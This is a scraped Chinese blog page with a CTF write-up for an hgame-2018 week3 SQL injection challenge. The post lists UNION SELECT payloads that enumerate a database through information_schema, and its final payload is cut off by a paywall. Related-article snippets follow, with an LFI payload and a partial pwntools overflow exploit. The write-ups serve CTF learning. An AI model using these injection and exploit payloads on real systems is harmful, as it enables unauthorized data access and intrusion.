hgame-2018 CTFwp（杭电信安）week3

最新推荐文章于 2025-02-20 21:39:14 发布

「已注销」

最新推荐文章于 2025-02-20 21:39:14 发布

阅读量1.5k

点赞数 1

本文链接：https://blog.youkuaiyun.com/qingchenldl/article/details/79436206

版权

送分的sqli

这题没有任何过滤什么的，真的是很简单了。

1 and 1=-1 union select 1,schema_name from information_schema.schemata

查看库名，得：

1    information_schema
1    test
1    week3_sqliiii2

?id=1 and 1=-1 union select 1,table_name from information_schema.tables

查表，得：

。。。
1    test
1    f111aa4g
1    users

猜测在f111aa4g里：

查列名

?id=1 and 1=-1 union select 1,column_name from information_schema.columns

1    f111aaaggg_w3
1    username

猜测在f111aaaggg_w3里。
最后payload：

http://118.25.18.223:10068/?id=-1

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

「已注销」

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

BUUCTF hgame2018_flag_server

weixin_45441024的博客

11-28

486

BUUCTF hgame2018_flag_server 下载附件之后永远都是先check一下紧接着我们将其拖入IDA中查看一下： int __cdecl main(int argc, const char **argv, const char **envp) { unsigned int v3; // eax@13 int result; // eax@20 int v5; // ecx@20 int v6; // [sp+8h] [bp-60h]@6 int v7; // [sp

hgame-2018 CTFwp（杭电信安）week1

苟有恒，必有三更眠，五更起。

03-04

3153

原题链接由于开放时间短，不知道什么时候结束。我会将题目的大致内容以图片形式down下来。 web1 Are you from Europe? URL http://123.206.203.108:10001/European.html 一看题，就感觉想是用burp抓包做，来自欧洲，就想到改语言，accept-langue字段。但是，我试了en，gk等等值，并没有什么卵用。而且发现

参与评论您还未登录，请先登录后发表或查看评论

hgame-2018 CTFwp（杭电信安）week2

苟有恒，必有三更眠，五更起。

03-04

832

草莓社区-1 描述 flag在../flag.php中知识点：LFI URL http://118.25.18.223:10011/ 基准分数 100 当前分数 100 完成人数 118 提示很清楚，简单的本地包含： payload： http://118.25.18.223:10011/show_maopian.php?mao=../flag.ph

HGAME-CTF-2025-WEB

最新发布

Rsecret2的博客

02-20

934

2025-HGAME-CTF-WEB

HGAME 2018 Web Week2 Random?

柠檬木有枝

10-21

611

题目描述提示 vim 改代码，vim 会生成 swp 文件以防止出错是恢复，直接 dowm 下 swp 文件恢复源码，这里比较坑的一点是完整的文件名是.random.php.swp。恢复过后 random.php 源码如下要求传入一串对象的序列化内容，而且这个对象的两个变量会被赋予随机值，要求这两个变量的值相等方能getflag。起初考虑了一下觉得是反序列化漏洞，但是却不存在魔术方法...

hgame2018_flag_server

z1r0的博客

03-01

406

hgame2018_flag_server 查看保护 v10为1就可以cat flag。这题的漏洞点出在了read_n这里，当a2为-1时，可以输入很长的一个数值。输入的数据和要覆盖的数据差了0x40。攻击思路：用-1输入长数据，放0x40的无用数据第0x41这里放入1即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if deb

[BUUCTF-pwn]——hgame2018_flag_server

Y_peak的博客

04-03

453

[BUUCTF-pwn]——hgame2018_flag_server 保护开启了 NX和canary 看下反汇编，只要v10非0就可以得到flag, 也就是v6 = v8，但是显然v8是一个随机数，并且没有找到可以修改的地方。仔细观察上面的代码，一旦v5为负数，我们就可以无限输入了，并且s1距离v10为0x40 = 64，我们只需要输入0x40个字符就可以开始修改v10了 exploit from pwn import * p = remote("node3.buuoj.cn",28128) p

虚拟机挑战解析：hgame-week4-easyvm与cg-ctf WxyVM

"虚拟机题目解析，包括hgame-week4-easyvm、cg-ctf wxyVM1/2，涉及虚拟机基础知识、数据处理及逆向工程" 虚拟机技术是计算机科学中的一个重要领域，它允许在单一硬件系统上运行多个操作系统实例。在网络安全和密码...

hgame2019 week1 wp

qq_42192672的博客

02-02

951

这次新搭了gitpage+hexo的博客 wp第一次就放在上面啦链接：https://woaixiaoyuyu.github.io/2019/01/30/hgame2019-week1-wp/#more

Hgame-WP 2023 部分题解

DoubleLiii的博客

02-01

360

题解

HgameCTF 2024 web&misc wp

Nanian233的博客

03-07

1070

HgameCTF 2024 web&misc 个人wp

[杭电新生赛]HGAME-week1-web-wp

静仙的博客

02-18

927

web萌新ctf之旅

flask框架漏洞

JJT

05-14

7814

在ctf里遇到了关于flask框架漏洞的题，此篇博文较为详细转自https://www.jianshu.com/p/56614e46093e 一、简介 Flask 是一个使用 Python 编写的轻量级 Web 应用框架。Flask 依赖两个外部库： Jinja2模板引擎和WSGI 工具集。 1、常用概念 WSGI 只是一种接口,它只适用于 Python 语言，其全称为 Web Server Gateway Interface，定义了 web服务器和 web应用之间的接口规范。也就是说，只要 w.

hgame2023-week3

247533的博客

02-01

1028

过年打麻将摆烂。

hgame week3 kmusic(z3)

qq_54894802的博客

02-06

253

比较特别的z3求解，简单的.net逆向

hgame-week3-web-wp

www_xuhss_com的博客

02-12

383

Python微信订餐小程序课程视频 https://edu.youkuaiyun.com/course/detail/36074 Python实战量化交易理财系统 https://edu.youkuaiyun.com/course/detail/35475 hgame第三周（web ak） 1.SecurityCenter 先看看hint（**vendor是第三方库和插件放置的文件夹，一般来源于composer的安装）找到了使用的twig模板，应该是twig模板注入查博客依葫芦画瓢http://146.56.223.

[杭电Hgame]2021web week2（变量覆盖+多线程条件竞争+sql注入）

Huamang的博客

02-15

545

LazyDogR4U 考察变量覆盖，这篇博客写的很详细首先是源码泄露，www.zip就可以拿到网站文件代码审计如果$_SESSION['username'] === 'admin'就会给flag if($_SESSION['username'] === 'admin'){ echo "<h3 style='color: white'>admin将于今日获取自己忠实的flag</h3>"; echo "<h3 style='color: wh

2019杭电CTF HGAME Writeup

欢迎光临

01-27

3106

前言第一次AK了web… WEB 谁吃了我的flag 呜呜呜，Mki一起床发现写好的题目变成这样了，是因为昨天没有好好关机吗T_T hint: 据当事人回忆，那个夜晚他正在用vim编写题目页面，似乎没有保存就关机睡觉去了,现在就是后悔，十分的后悔。 hint 是后来增加的一开始做的时候就想到类vim文件泄露可是当时没有第二天看了出了hint 说是vim 再进行 /.index.html...